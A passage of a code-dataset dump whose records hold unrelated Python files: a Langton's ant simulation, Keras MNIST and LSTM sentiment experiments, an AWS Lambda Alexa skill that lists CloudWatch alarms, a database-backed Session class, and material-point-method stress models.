JavFullNet.test()\n","sub_path":"JavPy/sources/javfull_net.py","file_name":"javfull_net.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599782748","text":"from Cell2D import Cell2D\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom utils import underride\n\nclass Turmite(Cell2D):\n\n directions = ['N','E','S','W']\n # compass: N, E, S, W\n compass = [(1,0), (0,1), (-1, 0), (0, -1)]\n rules = {0:1, 1: -1}\n\n def __init__(self, m, n=None):\n \"\"\"Initialize Turmite.\n Currently only built for Langston's Ant.\n m: number of rows\n n: number of columns\n \"\"\"\n Cell2D.__init__(self, m, n)\n self.direction = 0 #Initialize pointing North\n #self.location syntax: (row, col)\n self.location = (m//2, n//2)\n\n def step(self):\n \"\"\"Move ant through one step. Currently only works for\n Langstons Ant.\n \"\"\"\n row, col = self.location\n self.turn()\n self.array[row, col] = (self.array[row, col] + 1) % 2\n self.forward()\n\n def turn(self):\n \"\"\"Turn ant basted on rules.\"\"\"\n val = self.array[self.location]\n rotate = Turmite.rules[val]\n self.direction = (self.direction + rotate) % 4\n\n def forward(self):\n \"\"\"Move ant forward one unit.\"\"\"\n row, col = self.location\n d_row, d_col = Turmite.compass[self.direction]\n self.location = (row + d_row, col + d_col)\n\n def init_fig(self, **options):\n \"\"\"Initialize figure for animation and drawing.\"\"\"\n options = underride(options,\n cmap='Greens',\n alpha=0.7,\n vmin=0, vmax=1,\n interpolation='none',\n origin='lower',\n extent=[0, self.n, 0, self.m])\n\n self.fig, self.ax = plt.subplots()\n self.im = self.ax.imshow(self.array, **options)\n row, col = self.location\n self.line, = self.ax.plot(col+0.5, row+0.5, 'r.')\n\n def update_anim(frame, self):\n \"\"\"Update frame of animation\"\"\"\n self.step()\n self.im.set_data(self.array)\n row, col = self.location\n self.line.set_data(col+0.5, row+0.5)\n\n def draw(self):\n \"\"\"Draw array and ant.\"\"\"\n self.init_fig()\n self.im.set_data(self.array)\n row, col = self.location\n self.ax.plot(col+0.5, row+0.5, 'r.')\n return self.fig\n\nif __name__ == '__main__':\n\n ant = Turmite(100, 100)\n ani = ant.animate()\n plt.show(block=True)\n","sub_path":"mycode/ch06_ant.py","file_name":"ch06_ant.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"126810276","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist # mnist: Modified National Institute of Standards and Technology database\nfrom keras.preprocessing.image import array_to_img\nimport matplotlib.pyplot as plt\n\ndef load_data(): # categorical_crossentropy\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n # take first 10,000 images and reshape\n number = 10000\n x_train = x_train[0:number]\n y_train = y_train[0:number]\n x_train = x_train.reshape(number, 28 * 28)\n x_test = x_test.reshape(x_test.shape[0], 28 * 28)\n\n # convert image array to float (from integer provided by mnist)\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n\n # convert class vectors to binary class matrices\n y_train = np_utils.to_categorical(y_train, 10)\n y_test = np_utils.to_categorical(y_test, 10)\n \n # x_train = x_train\n # x_test = x_test\n\n x_test = np.random.normal(x_test) # add noise\n\n # normalize the pixel values, now each value is 0 ~ 1\n x_train = x_train / 255\n x_test = x_test / 255\n\n return (x_train, y_train), (x_test, y_test)\n\ndef train_model(ep = 20):\n # load training data and testing data\n (x_train, y_train), (x_test, y_test) = load_data()\n\n # define network structure\n model = Sequential()\n\n model.add(Dense(input_dim=28 * 28, units=500, activation='relu'))\n # model.add(Dense(input_dim=28 * 28, units=500, activation='sigmoid'))\n # model.add(Dropout(0.5))\n\n # model.add(Dense(units=500, activation='relu'))\n # model.add(Dense(units=500, activation='sigmoid'))\n\n # model.add(Dropout(0.5))\n model.add(Dense(units=10, activation='softmax'))\n\n # set configurations\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # model.compile(loss='mse', optimizer=SGD(lr=0.1), metrics=['accuracy'])\n # model.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.1), metrics=['accuracy'])\n # model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n\n # train model\n # increasing batch_size makes result poor. with GPU this runs faster due to parallel computing \n model.fit(x_train, y_train, batch_size=100, epochs=ep)\n\n # save model\n # ca: 'categorical_crossentropy' + 'adam'\n # ms: 'mse' + SGD(lr=0.1)\n # cs: 'categorical_crossentropy' + SGD(lr=0.1)\n # ma: 'mse' + 'adam'\n model.save('models/model_ca_ep_{}.h5'.format(ep))\n\n # evaluate the model and output the accuracy\n # result_train = model.evaluate(x_train, y_train)\n # result_test = model.evaluate(x_test, y_test)\n # print('Train Acc:', result_train[1])\n # print('Test Acc:', result_test[1])\n\ndef load_trained_model(ep = 20):\n # load training data and testing data\n (x_train, y_train), (x_test, y_test) = load_data()\n\n # load trained model\n model = load_model('models/model_ca_ep_{}.h5'.format(ep))\n\n # evaluate the model and output the accuracy\n # result_train = model.evaluate(x_train, y_train)\n # result_test = model.evaluate(x_test, y_test)\n # print('Train Acc:', result_train[1])\n # print('Test Acc:', result_test[1])\n\n return model.evaluate(x_train, y_train)[1], model.evaluate(x_test, y_test)[1]\n\nif __name__ == '__main__':\n epochs = [10, 20, 30, 40, 50]\n \n # train model\n # for ep in epochs:\n # train_model(ep)\n\n # load trained model\n training_set_eval = []\n testing_set_eval = []\n\n for ep in epochs:\n res = load_trained_model(ep)\n training_set_eval.append(res[0])\n testing_set_eval.append(res[1])\n\n x = epochs\n y1 = training_set_eval\n y2 = testing_set_eval\n plot1, = plt.plot(x, y1, '-')\n plot2, = plt.plot(x, y2, '--')\n\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.title('mnist accuracy')\n plt.legend((plot1, plot2), ('Training set', 'Testing set'))\n plt.grid()\n plt.show()","sub_path":"keras/ntu_hylee_ml2017/keras_demo/keras_demo_epochs.py","file_name":"keras_demo_epochs.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"318225974","text":"from __future__ import print_function\nimport boto3\n\n#parameters\nregion = 'us-east-1'\n\ndef lambda_handler(event, context):\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\ndef on_launch(launch_request, session):\n return get_welcome_response()\n\ndef get_alarms():\n client = boto3.client('cloudwatch', region_name=region)\n response = client.describe_alarms(StateValue='ALARM')\n if len(response['MetricAlarms']) >= 1:\n return response\n else:\n return None\n\ndef get_welcome_response():\n session_attributes = {}\n card_title = \"AWS CloudWatch Alarms\"\n alarms = get_alarms()\n if alarms:\n speech_output = \"you have active alarms. I will list them now. \"\n for alarm in alarms:\n speech_output = speech_output + \"alarm..\" + alarm['AlarmName']\n else:\n speech_output = \"No outstanding CloudWatch Alarms\"\n reprompt_text = \"Please try again\"\n should_end_session = True\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362650366","text":"import datetime\nimport json\n\n\nclass Session:\n def __init__(self, start=None, finish=None, session_id=None, user_id=None):\n self.session_id = session_id\n self.user_id = user_id\n self.start_time = start\n self.finish_time = finish\n\n def start_session(self):\n self.start_time = datetime.datetime.now().isoformat(' ')\n print('session created at %s' % self.start_time)\n\n def finish_session(self):\n self.finish_time = datetime.datetime.now().isoformat(' ')\n print('session finished at %s' % self.finish_time)\n\n def __str__(self):\n return '(%s, %s)' % (self.start_time, self.finish_time)\n\n def as_dict(self):\n d = {\n 'id': self.session_id,\n 'user_id': self.user_id,\n 'start_time': self.start_time,\n 'finish_time': self.finish_time\n }\n return d\n\n def save(self, filename):\n json.dump(self.as_dict(), open(filename, 'wt'))\n\n def load(self, filename):\n object_as_dict = json.load(open(filename))\n self.start_time = object_as_dict['start_time']\n self.finish_time = object_as_dict['finish_time']\n\n def save_to_db(self, connection):\n sql_data = {\n 'session_id': self.session_id,\n 'user_id': self.user_id,\n 'start_time': self.start_time,\n 'finish_time': self.finish_time\n }\n sql_query = 'SELECT id FROM Session WHERE id=%(session_id)s;'\n with connection:\n cur = connection.cursor()\n cur.execute(sql_query, sql_data)\n data = cur.fetchall()\n if data:\n sql_query = 'UPDATE Session SET user_id = %(user_id)s, start_time = %(start_time)s, finishtime = %(finish_time)s WHERE id = %(session_id)s;'\n else:\n sql_query = 'INSERT INTO Session (id, user_id, start_time, finishtime) VALUES (%(session_id)s, %(user_id)s, %(start_time)s, %(finish_time)s);'\n cur.execute(sql_query, sql_data)\n\n def load_from_db(self, connection, session_id):\n sql_data = {\n 'session_id': session_id\n }\n sql_query = 'SELECT id, user_id, start_time, finishtime FROM Session WHERE id = %(session_id)s'\n with connection:\n cur = connection.cursor()\n cur.execute(sql_query, sql_data)\n loaded_data = cur.fetchall()[0]\n self.session_id = loaded_data[0]\n self.user_id = loaded_data[1]\n self.start_time = loaded_data[2]\n self.finish_time = loaded_data[3]\n\n def delete_from_db(self, connection, session_id):\n sql_data = {\n 'session_id': session_id\n }\n sql_query = 'DELETE FROM Session WHERE id = %(session_id)s;'\n with connection:\n cur = connection.cursor()\n cur.execute(sql_query, sql_data)\n\n","sub_path":"homework8/mypackage/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"170795142","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport string\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Embedding, Bidirectional, GlobalMaxPool1D\nfrom keras.layers.core import SpatialDropout1D\nfrom sklearn.model_selection import StratifiedKFold\nfrom keras.datasets import imdb\nfrom keras.layers import LSTM\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nfrom keras.models import model_from_json\n\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import SnowballStemmer\n\nfrom gensim import corpora\n# from imblearn.over_sampling import SMOTE\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n# def parsePhrases(stopWords, engStemmer, phrases):\n# print \"parse the phrases with stopwords and stemmer\"\n# processedPhrases = []\n# for phrase in phrases:\n# tokens = word_tokenize(phrase)\n# parsedWords = []\n# for t in tokens:\n# if t not in stopWords:\n# parsedWords.append(engStemmer.stem(t))\n# processedPhrases.append(parsedWords)\n# return processedPhrases\npostProcessedTrainPhrases = []\npostProcessedTestPhrases = []\n\ndef preprocessData():\n print(\"Loading and preprocessing data...\")\n # load training and testing data\n with open('labeled_document_firstiter.json') as json_data:\n allTrainData = json.load(json_data)\n \n with open('labeled_document_seconditer.json') as json_data:\n allTrainData2 = json.load(json_data)\n\n \n trainPhrases, testPhrases, trainLabel,testLabel = train_test_split(allTrainData['Comment'] + allTrainData2['Comment'], allTrainData['CommentLabel']+allTrainData2['CommentLabel'], test_size=0.2, random_state=42)\n \n# print(testPhrases[0:100])\n punctuation = list(string.punctuation)\n stopWords = stopwords.words('english') + punctuation \n\n engStemmer = SnowballStemmer('english')\n for phrase in trainPhrases:\n if not isinstance(phrase, str):\n continue\n tokens = word_tokenize(phrase)\n parsedWords = []\n for t in tokens:\n if t not in stopWords:\n parsedWords.append(engStemmer.stem(t))\n postProcessedTrainPhrases.append(parsedWords)\n\n for phrase in testPhrases:\n if not isinstance(phrase, str):\n continue\n tokens = word_tokenize(phrase)\n parsedWords = []\n for t in tokens:\n if t not in stopWords:\n parsedWords.append(engStemmer.stem(t))\n postProcessedTestPhrases.append(parsedWords)\n return (trainLabel,testLabel)\n\n\ndef convertPhrasesToIDs(phrases):\n print (\"converting the phrases to id to be processed\")\n wordIDs = []\n wordIDLens = []\n for phrase in phrases:\n ids = []\n for word in phrase:\n ids.append(toIDMap.token2id[word])\n wordIDs.append(ids)\n wordIDLens.append(len(ids))\n return ( wordIDs, wordIDLens )\n\ndef findSequenceLen(wordListLen):\n print( \"calculate the norm sequence length\")\n wordLenMean = np.mean(wordListLen)\n wordLenStd = np.std(wordListLen)\n return np.round(wordLenMean + 3 * wordLenStd).astype(int)\n\n\n\n# In[2]:\n\n\n(trainSenti, testSenti) = preprocessData()\n\n# process training data and testing data\n\n# print(len(postProcessedTrainPhrases), len(trainSenti))\ntoIDMap = corpora.Dictionary(np.concatenate((postProcessedTrainPhrases, postProcessedTestPhrases), axis=0))\nallPhraseSize = len(toIDMap.keys())\n\n(trainWordIDs, trainWordIDLens) = convertPhrasesToIDs(postProcessedTrainPhrases)\n(testWordIDs, testWordIDLens) = convertPhrasesToIDs(postProcessedTestPhrases)\n\nsequenceLen = findSequenceLen(trainWordIDLens + testWordIDLens)\n\nprint( \"pad sequence\")\ntrainingData = sequence.pad_sequences(np.array(trainWordIDs), maxlen=sequenceLen)\ntestingData = sequence.pad_sequences(np.array(testWordIDs), maxlen=sequenceLen)\nprint(trainingData.shape)\n\nprint (\"categorize the labels\")\n#print len(np.unique(trainSenti))\ntrainingDataLabel = np_utils.to_categorical(trainSenti, len(np.unique(trainSenti)))\n\n# print(trainingDataLabel.shape)\n\n\n\n# In[6]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras.constraints import maxnorm\nfrom sklearn.metrics import precision_recall_fscore_support\n\n# def create_model(hidden_size, activation, optimizer, dropout_rate):\n# # default values\n# # activation='tanh' # or linear\n# # dropout_rate=0.0 # or 0.2\n# init_mode='uniform'\n# weight_constraint=0 # or 4\n# # optimizer='adam' # or SGD\n# lr = 0.01\n# momemntum=0\n# # hidden_size = 128\n# # create model\n# model = Sequential()\n# model.add(Embedding(allPhraseSize, embedding_size))\n# model.add(SpatialDropout1D(dropout_rate))\n# # model.add(Dense(8, \n# # input_dim=input_dim, kernel_initializer=init_mode, \n# # activation=activation,\n# # kernel_constraint=maxnorm(weight_constraint)))\n# # model.add(Dropout(dropout_rate)) \n# model.add(Bidirectional(LSTM(hidden_size, activation=activation)))\n# model.add(Dense(2, kernel_initializer=init_mode))\n# model.add(Activation(activation))\n# # Compile model\n# model.compile(loss='categorical_crossentropy', \n# optimizer=optimizer, \n# metrics=['accuracy'])\n# return model\n\n# model = KerasClassifier(build_fn=create_model, batch_size=100, epochs=10) \n# epochs = [5, 10, 50, 100, 500]\n# optimizer = ['sgd', 'RMSprop', 'adam']\n# activation = ['tanh','softmax','relu','sigmoid']\n# hid_size = [64, 128, 256]\n# dropoutrate = [0.0, 0.05, 0.1, 0.25, 0.5]\nembedding_size = 128\n# parameters = {'optimizer':('sgd', 'RMSprop', 'adam'), 'activation':[1, 10]}\nactivation = ['sigmoid', 'hard_sigmoid','softmax'] # softmax, softplus, softsign \nhidden_size = [ 128]\n# momentum = [0.0, 0.2, 0.4, 0.6, 0.8, 0.9]\n# learn_rate = [0.001, 0.01, 0.1, 0.2]\ndropout_rate = [0.1, 0.5]\n# weight_constraint=[1, 2, 3, 4, 5]\n# neurons = [1, 5, 10, 15, 20, 25, 30]\n# init = ['uniform', 'lecun_uniform', 'normal', 'zero', 'glorot_normal', 'glorot_uniform', 'he_normal', 'he_uniform']\noptimizer = [ 'SGD', 'RMSprop', 'Adam']\nepochs = [10, 100] \nbatch_size = [256]\n# param_grid = dict(epochs=epochs, batch_size=batch_size, activation = activation, dropout_rate = dropout_rate, optimizer = optimizer, hidden_size = hidden_size)\n\n# grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1)\n# grid_result = grid.fit(trainingData,trainingDataLabel) \n# print(\"Best: %f using %s\" % (grid_result.best_score_, grid_result.best_params_))\n# means = grid_result.cv_results_['mean_test_score']\n# stds = grid_result.cv_results_['std_test_score']\n# params = grid_result.cv_results_['params']\n# for mean, stdev, param in zip(means, stds, params):\n# print(\"%f (%f) with: %r\" % (mean, stdev, param))\ncount = 1\ntotal_result = {}\ntestingDataLabel = np_utils.to_categorical(testSenti, len(np.unique(testSenti)))\nHIDDEN_SIZE = 128\n# with open(\"parameters_temp.json\", mode='w', encoding='utf-8') as f:\nfor epoch_choice in epochs:\n for batch_choice in batch_size:\n for activation_choice in activation:\n for dropoutrate in dropout_rate:\n for optimizer_choice in optimizer: \n # for HIDDEN_SIZE in hidden_size: \n model = Sequential()\n model.add(Embedding(allPhraseSize, embedding_size))\n model.add(SpatialDropout1D(dropoutrate))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE, return_sequences=True)))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE, return_sequences=True)))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE)))\n #model.add(Bidirectional(LSTM(128)))\n #model.add(Flatten())\n model.add(Dense(len(np.unique(trainSenti))))\n model.add(Activation(activation_choice))\n # model.add(CRF(2, sparse_target=True))\n\n model.compile(loss='categorical_crossentropy', optimizer=optimizer_choice, metrics=['accuracy'])\n\n model.fit(trainingData,trainingDataLabel , epochs=epoch_choice, batch_size=batch_choice, verbose=1)\n\n res = model.predict(testingData)\n res = [(np.array(l)/sum(l)).tolist() for l in res]\n # print(predicted)\n predicted = []\n # negcount = 0\n # poscount = 0\n for i in res:\n if i[0] > i[1]:\n # negcount +=1\n predicted.append(0)\n else:\n # poscount +=1\n predicted.append(1)\n # print(predicted)\n total_result[count] = {}\n\n tn, fp, fn, tp = confusion_matrix(testSenti, predicted).ravel()\n print(tn, fp, fn, tp)\n total_result[count]['confusion_matrix'] = []\n total_result[count]['confusion_matrix'].append(int(tn))\n total_result[count]['confusion_matrix'].append(int(fp))\n total_result[count]['confusion_matrix'].append(int(fn))\n total_result[count]['confusion_matrix'].append(int(tp))\n print(total_result[count]['confusion_matrix'])\n report = precision_recall_fscore_support(testSenti, predicted)\n total_result[count]['precision'] = report[0][0]\n total_result[count]['recall'] = report[1][0]\n total_result[count]['fbeta_score'] = report[2][0]\n print(report)\n # print(report.fbeta_score)\n scores = model.evaluate(testingData, testingDataLabel, verbose=0)\n total_result[count]['accuracy'] = scores[1] * 100\n total_result[count][\"ep\"] = epoch_choice\n total_result[count][\"batch\"] = batch_choice\n total_result[count][\"act\"] = activation_choice\n total_result[count][\"drop\"] = dropoutrate\n total_result[count][\"op\"] = optimizer_choice\n # total_result[count][\"hid\"] = HIDDEN_SIZE\n # total_result[count]['model'] = [epoch_choice, batch_choice,activation_choice,dropoutrate, optimizer_choice,HIDDEN_SIZE]\n f = open(\"parameters_temp_stack3.json\", 'w')\n f.write(json.dumps(total_result, indent=4, sort_keys=True))\n f.close()\n count += 1\n\nf = open(\"parameters_all_stack3.json\", 'w+')\nf.write(json.dumps(total_result, indent=4, sort_keys=True))\nf.close()\n# In[83]:\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ncolor = sns.color_palette()\ny1 = []\ny2 = []\ny3 = []\ny4 = []\nx = range(1,count)\nfor i in x:\n y1.append(total_result[i]['precision'])\n y2.append(total_result[i]['recall'])\n y3.append(total_result[i]['fbeta_score'])\n y4.append(total_result[i]['accuracy'])\n\nplt.figure(figsize=(20,12))\nsns.pointplot(x, y1, alpha=0.8, color=color[1])\nsns.pointplot(x, y2, alpha=0.8, color=color[2])\nsns.pointplot(x, y3, alpha=0.8, color=color[3])\nsns.pointplot(x, y4, alpha=0.8, color=color[4])\n\nplt.ylabel('Evaluation', fontsize=12)\nplt.xlabel('Parameters combination', fontsize=12)\nplt.title(\"Single Stack LSTM\", fontsize=15)\nplt.xticks(rotation='vertical')\nplt.show()\nplt.savefig(\"LSTM3.png\")\n\n# from sklearn.metrics import precision_recall_fscore_support\n# res = model.predict(testingData)\n# res = [(np.array(l)/sum(l)).tolist() for l in res]\n# # print(predicted)\n# predicted = []\n# negcount = 0\n# poscount = 0\n# for i in res:\n# if i[0] > i[1]:\n# negcount +=1\n# predicted.append(0)\n# else:\n# poscount +=1\n# predicted.append(1)\n\n# print(\"negative: \", negcount)\n# print(\"positive: \", poscount)\n\n# matrix = confusion_matrix(testSenti, predicted)\n# print(matrix)\n# report = precision_recall_fscore_support(testSenti, predicted)\n# print(\"precision: \", report[0][0])\n# print(\"recall: \", report[1][0])\n# print(\"fbeta_score: \",report[2][0] )\n# print(report.recall)\n# # print(report.fbeta_score)\n# scores = model.evaluate(testingData, testingDataLabel, verbose=0)\n# print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1] * 100))\n\n\n# # In[29]:\n\n\n# model_json = model.to_json()\n# with open(\"LSTM.json\", \"w\") as json_file:\n# json_file.write(model_json)\n# # serialize weights to HDF5\n# model.save_weights(\"LSTM.h5\")\n# print(\"Saved model to disk\")\n\n\n# # In[37]:\n\n\n# json_file = open('LSTM.json', 'r')\n# loaded_model_json = json_file.read()\n# json_file.close()\n# loaded_model = model_from_json(loaded_model_json)\n# # load weights into new model\n# loaded_model.load_weights(\"LSTM.h5\")\n# print(\"Loaded model from disk\")\n\n\n# 1. Number of hidden layers\n# 2. Number of hidden units per layer (usually same number in each layer)\n# 3. Learning rate of the optimizer\n# 4. Dropout rate (in RNNs dropout is perhaps better applied to feed forward connections only)\n# 5. Number of iterations\n\n# 1 lstm\n# negative: 310\n# positive: 1936\n# [[ 186 159]\n# [ 124 1777]]\n# precision: 0.6\n# recall: 0.5391304347826087\n# fbeta_score: 0.5679389312977099\n# acc: 87.40%\n# \n# negative: 382\n# positive: 1864\n# [[ 211 134]\n# [ 171 1730]]\n# precision: 0.5523560209424084\n# recall: 0.6115942028985507\n# fbeta_score: 0.5804676753782669\n# acc: 86.42%\n\n# http://colah.github.io/posts/2015-08-Understanding-LSTMs/\n","sub_path":"models/LSTM/LSTM_tuning_stack3.py","file_name":"LSTM_tuning_stack3.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"140352993","text":"title = 'Exercise N°{}'\r\n\r\nprint(title.format(' 1 & 3'), '\\n')\r\n\r\ndef homographic(x):\r\n try:\r\n return 1/x\r\n except Exception as e:\r\n print('\"{}\" error occurred!'.format(e), '\\n')\r\n\r\ndef enter_value(value):\r\n try:\r\n value = int(value)\r\n print('')\r\n print(\"It's homoraphic value is:\", homographic(value), '\\n')\r\n except ValueError:\r\n print('')\r\n print('Please enter a numeric value', '\\n')\r\n value = input('Please enter an integer: ')\r\n return enter_value(value)\r\n\r\nnum = input('Please enter an integer: ')\r\nenter_value(num)\r\n\r\nprint(title.format(2), '\\n')\r\n\r\n#name = input('Please enter your name: ')\r\nlast_name = input('Please enter your last name: ')\r\n\r\ntry:\r\n print('Your full name is', name + ' ' + last_name)\r\nexcept NameError:\r\n print('One of the names are missing')","sub_path":"BootrainAssignment11.py","file_name":"BootrainAssignment11.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"395608602","text":"import datetime\nimport json\n\n\ndef get_time():\n return datetime.datetime.now().isoformat()\n\n\ndef create_msg(data, status, status_msg):\n msg = {\n \"service\": \"insights-storage-broker\",\n \"account\": data.get(\"account\"),\n \"request_id\": data.get(\"request_id\"),\n \"inventory_id\": data.get(\"id\"),\n \"status\": status,\n \"status_msg\": status_msg,\n \"date\": get_time(),\n }\n\n return msg\n\n","sub_path":"src/storage_broker/mq/msgs.py","file_name":"msgs.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"207900275","text":"from numpy import linspace, sin, cos, pi, zeros, outer, array, dot\nfrom numpy import trunc, arctan, eye, trace, nan_to_num, tensordot\nfrom numpy import sqrt, abs, ones\nfrom numpy.linalg import norm\n\ndef elastic(MP,P,G):\n# MP.p = -trace(MP.stress)\n# s_ij = -MP.stress - eye(3)*MP.p\n# MP.q = sqrt(3.*sum(sum(s_ij*s_ij))/2.)\n de_kk = trace(MP.dstrain)\n de_ij = MP.dstrain - de_kk*eye(3)/3.\n MP.dstress = P.S.K*de_kk*eye(3) + 2.*P.S.G*de_ij\n MP.stress += MP.dstress\n MP.gammadot = sqrt(sum(sum(de_ij**2)))\n MP.pressure = trace(MP.stress)/3.\n MP.sigmav = MP.stress[1,1]\n MP.sigmah = MP.stress[0,0]\n for r in xrange(4):\n n = G.nearby_nodes(MP.n_star,r,P)\n G.pressure[n] += MP.N[r]*MP.pressure\n G.gammadot[n] += MP.N[r]*MP.gammadot/P.dt\n G.sigmav[n] += MP.N[r]*MP.sigmav\n G.sigmah[n] += MP.N[r]*MP.sigmah\n\ndef von_mises(MP,P,G):\n de_kk = trace(MP.dstrain) # scalar\n de_ij = MP.dstrain - de_kk*eye(3)/3. # matrix\n dsigma_kk = 3.*P.S.K*de_kk # scalar\n# dev_work_norm = norm(tensordot(MP.dev_stress,de_ij)) # scalar\n dev_work_norm = abs(sum(sum(MP.dev_stress*de_ij))) # scalar\n dev_stress_norm = sqrt(sum(sum(MP.dev_stress**2))) # scalar\n MP.dev_dstress = 2.*P.S.G*(de_ij - dev_work_norm/(2.*(P.S.k**2))*\n ((dev_stress_norm/(sqrt(2.)*P.S.k))**(P.S.s-2.))*MP.dev_stress) # matrix\n MP.sigma_kk += dsigma_kk # scalar\n MP.dev_stress += MP.dev_dstress # matrix\n MP.dstress = (MP.dev_stress + MP.sigma_kk*eye(3)/3.) - MP.stress # matrix\n MP.stress = MP.dev_stress + MP.sigma_kk*eye(3)/3. # matrix\n MP.yieldfunction = dev_stress_norm/(sqrt(2.)*P.S.k) - 1. # scalar\n MP.gammadot = sqrt(sum(sum(de_ij**2)))\n MP.pressure = trace(MP.stress)/3.\n MP.sigmav = MP.stress[1,1]\n MP.sigmah = MP.stress[0,0]\n\n for r in xrange(4):\n n = G.nearby_nodes(MP.n_star,r,P)\n G.pressure[n] += MP.N[r]*MP.pressure*MP.m\n G.yieldfunction[n] += MP.N[r]*MP.yieldfunction*MP.m\n G.gammadot[n] += MP.N[r]*MP.gammadot/P.dt*MP.m\n G.sigmav[n] += MP.N[r]*MP.sigmav*MP.m\n G.sigmah[n] += MP.N[r]*MP.sigmah*MP.m\n G.dev_stress[n] += MP.N[r]*norm(MP.dev_stress)*MP.m\n G.dev_stress_dot[n] += MP.N[r]*norm(MP.dev_dstress)/P.dt*MP.m\n\ndef dp(MP,P,G):\n# if P.t < .1: # isotropic loading\n# dstrain = eye(3)*1e-4*P.dt\n# elif P.t < .2: # shear\n# dstrain = 3e-8*ones((3,3))\n# dstrain = dstrain - eye(3)*trace(dstrain)/3.\n# else: # unload shear\n# dstrain = -2e-8*ones((3,3))\n# dstrain = dstrain - eye(3)*trace(dstrain)/3.\n dstrain = -MP.dstrain\n strain = -MP.strain\n stress = -MP.stress\n \n de_kk = trace(dstrain)\n de_ij = dstrain - de_kk*eye(3)/3.\n MP.p = trace(stress)/3.\n s_ij = stress - eye(3)*MP.p\n MP.q = sqrt(3.*sum(sum(s_ij*s_ij))/2.)\n \n MP.y = MP.q/(P.S.beta*MP.p + (P.S.mu-P.S.beta)*MP.p) - 1.\n# if MP.y > 0.:\n# print 'WARNING: y is: ' + str(MP.y)\n lambda_2 = ((3.*P.S.G*MP.p*sum(sum(s_ij*de_ij)) - P.S.K*MP.q**2.*de_kk)/\n (3.*P.S.G*P.S.mu*MP.p**2 + P.S.K*P.S.beta*MP.q**2))\n Gamma_2 = lambda_2*(lambda_2>0)\n dstress = (2.*P.S.G*(de_ij - 3./2.*s_ij/MP.q*Gamma_2*(MP.q/(P.S.mu*MP.p))**(P.S.s-1.)) +\n P.S.K*eye(3)*(de_kk + P.S.beta*Gamma_2*(MP.q/(P.S.mu*MP.p))**P.S.s))\n \n MP.dstress = -dstress\n MP.stress += MP.dstress\n \ndef inviscid(MP,P,G):\n MP.dstress = 0\n MP.stress = -P.F.P_0*eye(3)\n\ndef viscous(MP,P,G):\n MP.stress = 2.*(P.F.mu*MP.dstrain/P.dt\n - P.F.mu*trace(MP.dstrain/P.dt)*eye(3)/3.\n - P.F.P*eye(3)/2.)\n\ndef compressible(MP,P,G):\n MP.rho = MP.rho/(1 + trace(MP.dstrain))\n MP.V = MP.m/MP.rho\n P_hat = MP.eq_of_state(P) # pressure\n MP.strain_rate = MP.dstrain/P.dt\n MP.stress = 2.*(P.F.mu*MP.strain_rate\n - P.F.mu*trace(MP.strain_rate)*eye(3)/3.\n - P_hat*eye(3)/2.)\n MP.int_energy += 